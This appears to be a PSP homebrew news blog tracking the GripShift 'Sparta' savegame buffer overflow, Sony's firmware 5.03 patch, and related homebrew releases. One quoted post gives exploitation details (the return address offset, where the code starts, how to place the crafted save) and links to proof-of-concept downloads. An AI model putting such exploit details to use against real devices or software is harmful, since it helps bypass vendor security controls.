Update: It’s been confirmed: Firmware 5.03 indeed patches the GripShift save game exploit.

Sony has officially released PSP firmware 5.03. Now there isn’t much detail at this time; however, if you’re a PSP-3000 owner holding on tight to your GripShift UMD, I’d recommend not updating, not yet anyway…

According to Eric Lempel, “this is a small update that improves system software stability during use of some features.”… Yeah, I bet.

We’ll keep you posted.

Download: PSP Firmware (Official) 5.03

With so much drama in the PSP scene, it’s hard knowing who’s who and from what regime… But, somehow, someway, Dark_AleX sets the record straight like every single day… And today: a little background info concerning this bit of news — the GripShift kernel mode exploit video…

To quote Dark_AleX himself –

This is about how I trusted someone called “miriam” and I gave him a kernel exploit of C+D, which was found by joek (the ONLY ONE that deserves credit of that), just to play for HIMSELF, as it is being used to decrypt 3k modules, but the first thing he did was to show to others to get a bit of fame.

Now i realize not to trust anyone anymore, thanks.

So here we are today, stuck in user-mode land while completely HEN-less.

Dragula96 says it; “it just feels wrong when a Hello World is not followed by Pong.” Thus — a newly coded version of Pong for the Sparta/GripShift exploit. It’s Pong — what else can I say?

Download: Pong v1.0 (for Sparta/GripShift Exploit)

- source: qj

It is indeed exploit fever season, and the remedy — more N00bz! That’s right — the N00bz have combined forces with MaTiAz and FreePlay to help further expand on the recent “Sparta” (GripShift) exploit. The plan:

Our initial focus will be to make it easier to run standard homebrew via this exploit, by adapting eloader to it. This will be restricted purely to user-mode homebrew, since there is currently no public kernel-mode exploit that could be used here, and compatibility is likely to be patchy due to the security measures in the later firmwares which make determining all the syscalls almost impossible. Still, you can expect that at least some emulators and other popular pure user-mode homebrew will run.

So with that said, don’t get too excited for a downgrader solution yet. In the case of someone discovering a method to bust kernel mode wide open, then downgrading via Sparta could very well be possible.

- full article/source: noobz.eu

Back at it… MaTiAz & FreePlay have released a “Hello World” demonstration, as well as the SDK used to build said homebrew demo, for the newly discovered GripShift vulnerability.

Now coined the Sparta exploit, here’s what you should know: for the moment, you cannot downgrade or install a custom firmware with this, you may only enjoy Sparta-compiled homebrew and hope Sparta later leads to kernel mode access.

And finally, another video for your viewing pleasure –

FAQ
---
Q: Will this allow downgrading?
A: No, because this is an usermode exploit and functions required to downgrade are only available in kernel mode.

Q: Why the name?
A: Because the original exploit was found by overwriting the player name with "this is spartaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".

Q: Can/Will Sony block this?
A: Yes.

Q: I wanna make homebrew using the exploit. How?
A: Get FreePlay's GS SDK: http://tinyurl.com/sparta-sdk. It has some constraints though, check the readme. The Hello World was written with it.

Download:
The Sparta SDK
Hello World (for the Sparta Exploit)

– source: lan.st

Every so often some claims are made and videos surface, most completely fabricated, but this time — we have the real deal. Discovered by MaTiAz and proven successful by both MaTiAz and FreePlay is a user-mode buffer overflow exploit. The vulnerability lies within the GripShift save game loading routine. Check it –

It’s a step in the right direction all right.

Let me quote MaTiAz –

GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running). The return address is located at offset 0xA9 in the file. In this poc it points to 0×08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.

It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn’t [be bothered to] get Shine’s savegame tool working so it’s in plaintext form) is in the SDDATA.BIN form which Hellcat’s Savegame-Deemer produces (thanks to him, if the program didn’t exist I wouldn’t have bothered with this). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don’t forget to have Savegame-Deemer working, duh.

Download:

GripShift SaveGame Exploit (POC)
(both MaTiAz and FreePlay’s included)

Savegame Deemer
(to decrypt and use the unencrypted GripShift savegame)

- source: lan.st